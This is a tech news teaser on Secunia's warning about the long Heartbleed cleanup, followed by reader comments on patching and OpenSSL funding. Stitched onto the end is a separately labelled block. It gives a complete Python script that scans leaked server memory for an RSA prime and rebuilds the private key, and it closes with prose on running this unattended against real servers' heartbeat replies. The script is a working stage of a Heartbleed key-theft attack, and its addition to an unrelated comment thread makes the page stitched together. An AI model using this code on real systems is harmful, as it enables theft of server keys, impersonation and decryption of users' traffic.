
Fixing OpenSSL's Heartbleed flaw will take MONTHS, warns Secunia

Expunging the Heartbleed bug from vulnerable computers and gadgets is likely to take months, according to a leading vuln research firm. The cautionary assessment by Secunia comes as more and more products are judged to be vulnerable to the infamous OpenSSL security flaw. Heartbleed most obviously affected secure web servers but …

COMMENTS

This topic is closed for new posts.

I notice you're letting Apple off the hook for this one.


For the moment

The media is just waiting for a declaration from Steve Jobs before deciding to go with leniency or overzealous outrage.

Anonymous Coward

It will never be eradicated. So many routers etc. are deployed (with web front ends for management) that users can't update and ISPs can't be arsed to update. Then various embedded systems.

Perhaps these companies basing multi-billion dollar products on it should band together and pay the OpenSSL team more than the derisory combined total of US$2k pa they have been.


scaremongering

Although serious, this particular bug was only in the OpenSSL repository for a little over a year. So for appliances, such as managed routers, only those designed in that time will be vulnerable. And how many of them will have port 443 open to the world? If vulnerable routers have been distributed by e.g. ISPs, they should know their customers, and be able to issue upgrade notices.

Few heavyweight servers will be affected as they tend to use long-term stable versions of crucial software. Machines that are kept at cutting edge or actively managed will have received security patches within a day or two of the disclosure/announcement.

There may be problems with some Android based phones if the vendors choose not to push updates.

We need some perspective here.


"Machines that are kept at cutting edge or actively managed will have received security patches within a day or two of the disclosure/announcement."

Really? I'm sure that actively managed machines will have been patched quicker than others, but I'm also pretty much convinced that patching schedules tend not to be at the top of the urgency pile most of the time - until the waste product encounters the rotating propulsion system, that is.

Now that it has happened, all high-profile web sites are on the ball, no doubt, but I'm certain that we'll be hearing about this bug for as long as we've heard about unsalted (or non-existent) hashes for passwords.


Odd how Oracle releases products that use both NSS and OpenSSL, supports NSS yet doesn't support OpenSSL.

Nice to see Oracle putting patches out quickly, but supporting OpenSSL would have cost Larry less in the first place. To put it in language he understands, it probably wouldn't have cost more than a metre of yacht.


http://opensslrampage.org/

http://www.libressl.org/


Solutionism

Bitcoin and co. are examples of "solutionism": where technological solutions to non-technological problems are posed. Unsurprisingly, this is really popular with the tech invest lobby. Equally unsurprisingly, the solutions rarely solve the problems they are supposed to.


Re: Solutionism

Unsurprisingly, this is really popular with the tech invest lobby get-rich-quick crowd.

FTFY!


Secunia only rates the vulnerability as 9 out of 10 because the bug does not give rise to a remote code execution vulnerability.

So because it's a two step process - steal the admin's login credentials first - it's only moderately critical? Good to know.


Perhaps the two-step nature of the process means it can't be fully automated?


Perhaps the two-step nature of the process means it can't be fully automated?

I believe there are plenty of Heartbleed-based exploits that can be fully automated.

I've already pointed out in other Reg forums that identifying the server's private key can be fully automated. Once you have that, you could mount an active MITM attack (using e.g. DNS poisoning or phishing), or decrypt traffic you passively record, if you're in a position to do that. I don't see any reason why those can't be automated as well.

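The automated private-key identification the comment above refers to, as an added example that is not part of the original thread or of any commenter's code. The only server-side input it needs is the public modulus n from the certificate: a leaked memory window that divides n exactly is one of the RSA primes, and the whole private key follows from it. Everything here is constructed: a throwaway RSA key pair is generated in-process and one of its primes is planted in a fake "leaked heap" buffer standing in for data returned by a malformed heartbeat; the key size, buffer size, offset and seed are arbitrary choices for the demo.

```python
"""Scan a memory dump for an RSA prime that divides a known public modulus.

Added example (not from the original page). The 'leaked' buffer and the key
are constructed in-process so the script runs offline.
"""
import math
import random
from typing import Optional, Tuple


def is_probable_prime(n: int, rounds: int = 32) -> bool:
    """Miller-Rabin probable-prime test; adequate for a throwaway demo key."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = random.randrange(2, n - 1)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def random_prime(bits: int) -> int:
    """Random odd candidate with the top bit set, retried until probably prime."""
    while True:
        cand = random.getrandbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(cand):
            return cand


def find_factor_in_memory(n: int, dump: bytes, prime_bytes: int) -> Optional[Tuple[int, int]]:
    """Slide a prime_bytes window over dump; return (offset, factor) on a hit.

    OpenSSL keeps BIGNUM limbs little-endian on x86, so that reading is the one
    that matters for heap contents; the big-endian reading catches DER-encoded
    copies for free. Any window that divides n exactly is a prime factor.
    """
    for i in range(len(dump) - prime_bytes + 1):
        window = dump[i:i + prime_bytes]
        for order in ("little", "big"):
            cand = int.from_bytes(window, order)
            if 1 < cand < n and n % cand == 0:
                return i, cand
    return None


def rebuild_private_key(n: int, factor: int, e: int = 65537) -> Tuple[int, int]:
    """Given one prime of n, recover the other prime and the private exponent."""
    p = factor
    q = n // p
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)  # modular inverse; Python 3.8+
    return q, d


def demo(seed: int = 1234) -> dict:
    """Build a constructed key and 'leak', run the scan, verify the recovered key."""
    random.seed(seed)
    bits, e = 512, 65537
    while True:
        p, q = random_prime(bits), random_prime(bits)
        if math.gcd(e, (p - 1) * (q - 1)) == 1:
            break
    n = p * q
    prime_bytes = bits // 8
    # Constructed stand-in for a heap chunk returned by a heartbeat response:
    # random filler with p embedded as OpenSSL would hold it (little-endian).
    leaked = bytearray(random.getrandbits(8 * 4000).to_bytes(4000, "big"))
    offset = 1337  # arbitrary planting position for the demo
    leaked[offset:offset + prime_bytes] = p.to_bytes(prime_bytes, "little")

    hit = find_factor_in_memory(n, bytes(leaked), prime_bytes)
    if hit is None:
        return {"found": False}
    off, factor = hit
    other, d = rebuild_private_key(n, factor, e)
    msg = 0xC0FFEE
    roundtrip = pow(pow(msg, e, n), d, n) == msg  # sign/decrypt works with recovered d
    return {
        "found": True,
        "planted_offset": offset,
        "found_offset": off,
        "factor_is_p": factor == p,
        "recovered_q": other == q,
        "roundtrip": roundtrip,
    }


if __name__ == "__main__":
    print(demo())
```

The scan is linear in the dump size and needs no knowledge of where the key lives, which is why it lends itself to running unattended over every heartbeat response an attacker collects; against a real server the modulus comes from the served certificate and the dump from the over-long heartbeat replies.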